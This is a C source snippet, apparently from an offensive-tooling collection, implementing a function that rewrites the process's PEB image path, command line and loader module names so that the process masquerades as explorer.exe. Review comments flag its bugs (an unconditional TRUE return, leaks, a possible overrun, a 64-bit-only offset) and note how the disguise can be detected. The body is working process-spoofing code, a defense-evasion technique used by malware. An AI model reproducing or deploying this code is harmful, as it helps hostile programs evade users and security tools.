Masquerade Peb as Explorer
Example usage snippet
/*
 * Rewrites the current process's user-mode PEB strings so the process
 * presents itself as "<Windows folder>\explorer.exe": the ProcessParameters
 * ImagePathName and CommandLine, plus the FullDllName/BaseDllName of the
 * first entry in the loader's InMemoryOrder module list.
 *
 * Buffer: out parameter. On the success path it receives a HEAP_ZERO_MEMORY
 *         block of MAX_PATH WCHARs from the process heap holding the
 *         constructed path. It is never freed here, and RtlInitUnicodeString
 *         does not copy - the four UNICODE_STRINGs below point directly into
 *         it - so the caller must keep it alive for as long as the PEB is
 *         expected to reference it.
 *
 * Return: always TRUE (see EXIT_ROUTINE), even when one of the gotos fired
 *         before the PEB was touched. Callers therefore cannot tell success
 *         from failure, and on failure *Buffer may be NULL or a partially
 *         filled, leaked allocation. NOTE(review): a real status is needed
 *         here; a BOOL that is set only after RtlLeaveCriticalSection would do.
 *
 * Only user-mode PEB fields are written. The kernel's record of the process
 * image and the file on disk are unchanged, so tooling that reads the image
 * path from the kernel or the image file rather than from the PEB still sees
 * the real name; comparing the PEB ImagePathName against that value is the
 * natural detection check.
 */
BOOL MasqueradePebAsExplorer(PWCHAR *Buffer)
{
    /* Resolved at runtime from ntdll rather than linked; both are exported. */
    typedef NTSTATUS(NTAPI* RTLENTERCRITICALSECTION)(PRTL_CRITICAL_SECTION);
    typedef NTSTATUS(NTAPI* RTLLEAVECRITICALSECTION)(PRTL_CRITICAL_SECTION);
    RTLENTERCRITICALSECTION RtlEnterCriticalSection = NULL;
    RTLLEAVECRITICALSECTION RtlLeaveCriticalSection = NULL;
    HMODULE Module = NULL;
    LPWSTR WindowsPath = NULL;          /* CoTaskMemAlloc'd by SHGetKnownFolderPath */
    PPEB Peb = GetPeb();                /* project helper; assumed non-NULL - nothing checks it */
    PLDR_MODULE InMemoryBinaryLoaderData = NULL;

    Module = GetModuleHandleA("ntdll.dll");
    if (Module == NULL)
        goto EXIT_ROUTINE;
    RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)GetProcAddress(Module, "RtlEnterCriticalSection");
    RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress(Module, "RtlLeaveCriticalSection");
    if (!RtlEnterCriticalSection || !RtlLeaveCriticalSection)
        goto EXIT_ROUTINE;

    /* Windows directory, e.g. C:\Windows; released with CoTaskMemFree below. */
    if (!SUCCEEDED(SHGetKnownFolderPath(FOLDERID_Windows, 0, NULL, &WindowsPath)))
        goto EXIT_ROUTINE;

    /* Fixed MAX_PATH-WCHAR buffer. StringCopyW/StringConcatW are project
     * helpers that take no destination size, so nothing visible here bounds
     * the write to MAX_PATH; this assumes <Windows folder>\explorer.exe always
     * fits - TODO confirm the helpers enforce a limit, otherwise a long
     * Windows folder path overruns the heap block. On any failure from here
     * on, *Buffer is left allocated (leak) and the function still returns TRUE. */
    *Buffer = (PWCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_PATH * sizeof(WCHAR));
    if (*Buffer == NULL)
        goto EXIT_ROUTINE;
    if (StringCopyW(*Buffer, WindowsPath) == NULL)
        goto EXIT_ROUTINE;
    if (StringConcatW(*Buffer, (PWCHAR)L"\\explorer.exe") == NULL)
        goto EXIT_ROUTINE;

    /* Flink points at the InMemoryOrderLinks field inside the first loader
     * entry (normally the process image itself); subtracting 16 is a
     * hard-coded stand-in for CONTAINING_RECORD and only matches the
     * 64-bit layout, where the preceding InLoadOrderLinks occupies two
     * 8-byte pointers. NOTE(review): wrong on 32-bit builds - confirm the
     * target architecture or use CONTAINING_RECORD against LDR_MODULE. */
    InMemoryBinaryLoaderData = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);

    /* All four writes happen under FastPebLock, the lock the loader itself
     * takes for PEB updates; there is no failure path between enter and
     * leave, so the lock is always released. RtlInitUnicodeString only
     * re-points Buffer/Length at *Buffer - the previous string storage is
     * neither freed nor overwritten. */
    RtlEnterCriticalSection((PRTL_CRITICAL_SECTION)Peb->FastPebLock);
    RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, *Buffer);
    RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, *Buffer);
    RtlInitUnicodeString(&InMemoryBinaryLoaderData->FullDllName, *Buffer);
    RtlInitUnicodeString(&InMemoryBinaryLoaderData->BaseDllName, *Buffer);
    RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->FastPebLock);

EXIT_ROUTINE:
    /* Only the shell-allocated path is released; *Buffer is intentionally
     * kept because the PEB now references it. The unconditional TRUE is the
     * defect noted in the header. */
    if (WindowsPath)
        CoTaskMemFree(WindowsPath);
    return TRUE;
}